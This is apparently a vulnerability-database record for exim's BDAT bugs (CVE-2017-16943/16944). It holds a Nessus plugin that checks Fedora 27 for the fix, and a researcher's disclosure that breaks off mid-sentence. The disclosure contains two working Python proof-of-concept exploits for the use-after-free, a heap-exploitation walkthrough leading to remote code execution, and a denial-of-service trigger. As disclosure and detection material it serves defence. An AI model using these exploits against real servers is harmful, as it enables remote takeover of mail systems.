: exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:41:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-11-01T02:27:37", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": ["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": ["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"modified": "2019-11-01T02:27:37", "value": 7.6, "vector": "NONE"}}, "hash": "109b1267e16802bf153a79f054f04ab7ddef992dc6be82bc8c10047bf398c2a2", "hashmap": [{"hash": "5b0aef06cc449031985b7ee781024ce7", "key": "sourceData"}, {"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "0975adf19adb993cc2dc44ea6b27d31e", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "485c41a48047d23b0282ee19ec1cc5f9", "key": "href"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-11-01T02:27:37", "modified": "2019-11-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-11-01T02:27:37"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "9534580353e4d1e80d9c9d4dd82550d2"}, {"key": "cvelist", "hash": "4c79fb001bf5cf57d4d013553e6d201f"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "cc82f834bb7cc4b7c64d263036c9ad35"}, {"key": "href", "hash": "485c41a48047d23b0282ee19ec1cc5f9"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "24746ac5a48e8a4f39b11cf8e22e39f3"}, {"key": "published", "hash": "3fcf3472ec23d37b4712de598fcb8d16"}, {"key": "references", "hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb"}, {"key": "reporter", "hash": "0975adf19adb993cc2dc44ea6b27d31e"}, {"key": "sourceData", "hash": "5b0aef06cc449031985b7ee781024ce7"}, {"key": "title", "hash": "3b4669c901cc98352aa667bd94356c1b"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "6ea1fee246b377d82e88bbf615aa5bd735ba5b00f82d38c245518e084cab5897", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:96896", "SSV:96905"]}, {"type": "cve", "idList": ["CVE-2017-16944", "CVE-2017-16943"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873919", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310873907", "OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310843380"]}, {"type": "hackerone", "idList": ["H1:296994", "H1:296991"]}, {"type": "nessus", "idList": ["FEDORA_2017-0032BAA7D7.NASL", "ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "UBUNTU_USN-3493-1.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3499-1.NASL"]}, {"type": "amazon", "idList": ["ALAS-2017-932"]}, {"type": "thn", "idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4053-1:6BF76"]}, {"type": "gentoo", "idList": ["GLSA-201803-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:43184"]}, {"type": "zdt", "idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145152"]}, {"type": "ubuntu", "idList": ["USN-3499-1", "USN-3493-1"]}, {"type": "freebsd", "idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:3220-1"]}], "modified": "2019-12-13T07:04:30"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-12-13T07:04:30"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "105803", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "scheme": null}

{"seebug": [{"lastseen": "2017-12-25T18:30:33", "bulletinFamily": "exploit", "description": "On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.\r\n\r\n### About Exim\r\n\r\nExim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a [mail server survey](http://www.securityspace.com/s_survey/data/man.201710/mxsurvey.html) by E-Soft Inc. shows over half of the mail servers identified are running exim.\r\n\r\n### Affected\r\n\r\n* Exim version 4.88 & 4.89 with chunking option enabled.\r\n* According to our survey, about 150k servers affected on 21st November, 2017 (data collected from scans.io).\r\n\r\n### Vulnerability Details\r\n\r\nThrough our research, the following vulnerabilies were discovered in Exim. Both vulnerabilies involve in BDAT command. BDAT is an extension in SMTP protocol, which is used to transfer large and binary data. A BDAT command is like `BDAT 1024` or `BDAT 1024 LAST`. With the SIZE and LAST declared, mail servers do not need to scan for the end dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.\r\n\r\n* Use-after-free in receive_msg leads to RCE (CVE-2017-16943)\r\n* Incorrect BDAT data handling leads to DoS (CVE-2017-16944)\r\n\r\n### Use-after-free in receive_msg leads to RCE\r\n\r\n#### Vulnerability Analysis\r\n\r\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starts with `store_` such as `store_get`, `store_release`, `store_reset`. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:\r\n\r\n\r\n\r\nInitially, exim allocates a big storeblock (default 0x2000) and then cut it into stores when `store_get` is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the `current_block` is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. Exim maintains three `store_pool`, that is, there are three chains like the illustration above and every global variables are actually arrays.\r\nThis vulnerability is in `receive_msg` where exim reads headers: \r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\r\n```\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n```\r\n\r\nIt seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend store, the function `store_extend` checks whether the old store is the latest store allocated in `current_block`. It returns False immediately if the check is failed.\r\n\r\n[`store.c: 276 store_extend`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\r\n```\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n```\r\n\r\nOnce `store_extend fails`, exim tries to get a new store and release the old one. After we look into `store_get` and store_release, we found that `store_get` returns a store, but `store_release` releases a block if the store is at the head of it. That is to say, if `next->text` points to the start the `current_block` and store_get cuts store inside it for newtext, then `store_release(next->text)` frees `next->text`, which is equal to current_block, and leaves newtext and `current_block` pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\r\n\r\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc`, `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to bdat_getc in order to check left chunking data size and to handle following command of BDAT. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, and stores data into `next->text`, extends if insufficient.\r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\r\n```\r\nfor (;;)\r\n {\r\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\r\n \r\n /* If we hit EOF on a SMTP connection, it's an error, since incoming\r\n SMTP must have a correct \".\" terminator. */\r\n\r\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\r\n {\r\n smtp_reply = handle_lost_connection(US\" (header)\");\r\n smtp_yield = FALSE;\r\n goto TIDYUP; /* Skip to end of function */\r\n }\r\n```\r\n\r\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect. \r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\r\n```\r\n case BDAT_CMD:\r\n {\r\n int n;\r\n\r\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\r\n {\r\n (void) synprot_error(L_smtp_protocol_error, 501, NULL,\r\n US\"missing size for BDAT command\");\r\n return ERR;\r\n }\r\n```\r\n\r\nIn exim, it usually calls `synprot_error` to raise error message, which also logs at the same time.\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\r\n```\r\nstatic int\r\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\r\n{\r\nint yield = -1;\r\n\r\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\r\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\r\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\r\n```\r\n\r\nThe log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as `'\\n'->'\\\\n'`. Therefore, it asks `store_get` for memory to store strings.\r\nThis store makes `if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` failed when next extension occurs and then triggers use-after-free.\r\n\r\n### Exploitation\r\n\r\nThe following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to `0xdeadbeef`. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\n\r\nr.interactive()\r\n```\r\n\r\n* Running out of `current_block`\r\nIn order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\r\n\r\n\r\n\r\n* Starts BDAT data transfer\r\nAfter that, we send BDAT command to start data transfer. At the beginning, next and `next->text` are allocated by `store_get`. \r\n\r\n\r\n\r\nThe function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses ANOTHER `store_pool`, so it allocates from heap without changing `current_block` which `next->text` also points to.\r\n\r\n[`receive.c: 1734 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\r\n```\r\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\r\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\r\n```\r\n\r\n* Call `store_getc` inside `bdat_getc`\r\nThen, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the `current_block` with `store_get` in `string_printing`. \r\n\r\n\r\n\r\n* Keep sending msg until extension and bug triggered\r\nIn this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to unsortbin inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \r\n\r\n\r\n\r\n* Keep sending msg for the next extension\r\nWhen the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena.\r\n\r\n* Overwrite global variables in libc\r\n* Finish sending message and trigger `free()`\r\nIn the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\r\nHowever, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of stdout and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \r\nWe consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. \r\n\r\n\r\n\r\n### Exploit for default configured exim\r\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsortbin.\r\n\r\nThe illustrations below describe the difference of heap layout:\r\n\r\n\r\n\r\n\r\n\r\nTo avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\r\n\r\nAfter running out of `current_block`:\r\n\r\n* Use DATA command to send lots of data\r\nSend huge data, make the chunk big and extend many times. After several extension, it calls `store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\r\n* End DATA transfer and start a new email\r\nRestart to send an email with BDAT command after the heap chunk is prepared.\r\n* Adjust `yield_length` again\r\nSend invalid command with an unprintable charater again to cut the `current_block`.\r\n\r\nFinally the heap layout is like:\r\n\r\n\r\n\r\nAnd now we can go back to the step 2 at the beginning and create the same situation. When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\r\n\r\nThe following is the PoC for default configured exim:\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('localhost', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1280+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('DATA')\r\nr.recvuntil('itself\\r\\n')\r\nr.sendline('b'*0x4000+':\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.recvline()\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x3480+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.send('\\n')\r\nr.interactive()\r\n```\r\n\r\nA demo of our exploit is as below.\r\n\r\n\r\n\r\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\r\n\r\n### Incorrect BDAT data handling leads to DoS\r\n\r\n#### Vulnerability Analysis\r\n\r\nWhen receiving data with BDAT command, SMTP server should not consider a single dot `'.'` in a line to be the end of message. However, we found exim does in receive_msg when parsing header. Like the following output:\r\n```\r\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\r\nEHLO test\r\n250-devco.re Hello root at test\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN CRAM-MD5\r\n250-CHUNKING\r\n250-STARTTLS\r\n250-PRDR\r\n250 HELP\r\nMAIL FROM:<meh@some.domain>\r\n250 OK\r\nRCPT TO:<meh@some.domain>\r\n250 Accepted\r\nBDAT 10\r\n.\r\n250- 10 byte chunk, total 0\r\n250 OK id=1eJFGW-000CB0-1R\r\n```\r\n\r\nAs we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same and an infinite loop occurs inside `bdat_getc`. Program crashes due to stack exhaustion.\r\n\r\n[`smtp_in.c: 546 